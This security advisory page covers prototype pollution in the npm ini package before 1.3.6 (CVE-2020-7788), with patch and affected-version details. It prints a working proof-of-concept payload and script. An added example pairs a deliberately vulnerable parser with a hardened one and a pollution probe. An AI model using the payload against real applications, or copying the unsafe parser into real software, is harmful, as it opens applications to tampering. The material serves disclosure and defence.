Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXFxZ3gtMnAyaC05YzM3
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Overview
The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini:
```ini
[__proto__]
polluted = "polluted"
```
poc.js:
```js
var fs = require('fs')
var ini = require('ini')
// With ini < 1.3.6 the [__proto__] section is written onto Object.prototype
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
```
Output:
```
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```
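Added example, not code from the advisory or from the ini package: a minimal INI parser in the vulnerable shape the advisory describes, a hardened variant beside it, and a probe that reports whether Object.prototype was polluted, all run over the payload above. The names tokenize, parseIniUnsafe, parseIniSafe, FORBIDDEN and probePollution are this example's own and do not mirror ini's API or its actual fix commit.

```javascript
// Constructed sample input: the payload.ini contents from the advisory, embedded inline.
const PAYLOAD = '[__proto__]\npolluted = "polluted"\n';

// Shared tokenizer for the INI subset used here: "[section]" headers and key = value pairs.
function* tokenize(text) {
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line[0] === ';' || line[0] === '#') continue;
    const sec = /^\[(.*)\]$/.exec(line);
    if (sec) { yield { section: sec[1] }; continue; }
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    yield { key: line.slice(0, eq).trim(), value: line.slice(eq + 1).trim().replace(/^"(.*)"$/, '$1') };
  }
}

// Vulnerable shape (hypothetical, mirrors the pre-1.3.6 behaviour the advisory describes):
// sections are looked up on a plain object, so "[__proto__]" resolves to Object.prototype
// and every pair under it is written onto every object in the process.
function parseIniUnsafe(text) {
  const out = {};
  let cur = out;
  for (const t of tokenize(text)) {
    if (t.section !== undefined) cur = out[t.section] = out[t.section] || {};
    else cur[t.key] = t.value;
  }
  return out;
}

// Hardened shape: null-prototype containers (no inherited __proto__ setter to hit) plus a
// deny-list, so these names never reach a normal object downstream either.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function parseIniSafe(text) {
  const out = Object.create(null);
  let cur = out;
  for (const t of tokenize(text)) {
    if (t.section !== undefined) cur = FORBIDDEN.has(t.section) ? null : (out[t.section] ??= Object.create(null));
    else if (cur !== null && !FORBIDDEN.has(t.key)) cur[t.key] = t.value;
  }
  return out;
}

// Probe: returns whatever leaked onto Object.prototype under `name` (undefined when clean)
// and deletes it, so the check leaves no residue behind.
function probePollution(name) {
  const leaked = ({})[name];
  delete Object.prototype[name];
  return leaked;
}
parseIniUnsafe(PAYLOAD);
console.log('after unsafe parse:', probePollution('polluted')); // polluted
parseIniSafe(PAYLOAD);
console.log('after safe parse:', probePollution('polluted'));   // undefined
```

The same probe works as a post-parse check in an application: if a parse of untrusted input leaves anything on Object.prototype, treat the input as hostile and the parser as unpatched.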
Permalink: https://github.com/advisories/GHSA-qqgx-2p2h-9c37
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXFxZ3gtMnAyaC05YzM3
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: 9 months ago
CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Identifiers: GHSA-qqgx-2p2h-9c37, CVE-2020-7788
References:
- https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
- https://www.npmjs.com/advisories/1589
- https://snyk.io/vuln/SNYK-JS-INI-1048974
- https://nvd.nist.gov/vuln/detail/CVE-2020-7788
- https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
- https://github.com/advisories/GHSA-qqgx-2p2h-9c37
Blast Radius: 46.0
Affected Packages
npm:ini
Dependent packages: 3,846
Dependent repositories: 1,985,226
Downloads: 188,363,419 last month
Affected Version Ranges: < 1.3.6
Fixed in: 1.3.6
All affected versions: 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5
All unaffected versions: 1.3.6, 1.3.7, 1.3.8, 2.0.0, 3.0.0, 3.0.1, 4.0.0, 4.1.0, 4.1.1, 4.1.2